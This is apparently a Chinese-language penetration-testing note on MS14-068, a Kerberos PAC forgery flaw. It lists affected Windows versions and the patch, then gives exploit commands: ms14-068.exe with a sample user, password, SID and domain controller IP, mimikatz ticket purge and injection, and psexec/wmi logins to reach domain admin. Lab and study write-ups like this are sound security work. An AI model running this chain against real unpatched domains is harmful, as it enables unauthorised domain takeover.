MS 14-068默认影响版本
    Windows Server 2003
    Windows Vista
    Windows Server 2008
    Windows 7
    Windows Server 2008 R2
    Windows 8 and Windows 8.1
    Windows Server 2012 and Windows Server 2012 R2
    Server Core installation option

    漏洞补丁编号
    KB3011780
    漏洞原理:
    PAC身份验证出现问题,导致用户可以绕过PAC签名伪造一张高权限PAC,绕过验证。

    Ms14068漏洞允许域内任何一个普通用户,将自己提升至域管权限 利用工具 https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068 利用条件: 一个域用户的账号密码 域账户SID 域没打补丁

    1、获取SID: image.png 2、使用工具:ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 例如 MS14-068.exe -u aaa@ice.com -p a123456. -s S-1-5-21-3407442749-832362525-3552103015-1106 -d 192.168.204.133 如果成功,会输出一个.ccache文件 image.png

    3、使用mimikatz注入到.ccache文件中 mimikatz # kerberos::purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造 mimikatz # kerberos::list //查看当前机器凭证 mimikatz # kerberos::ptc 票据文件 //将票据注入到内存中

    image.png
    4、klist查看并使用net use或者psexec,wmi进行登陆
    这里按道理是要成功了,但是还是失败了,这里我用的是域内主机的本地用户
    image.png
    后来登录到域用户aaa中,ms14-068成功
    image.png
    5、或者使用工具kekeo(不需要管理员权限)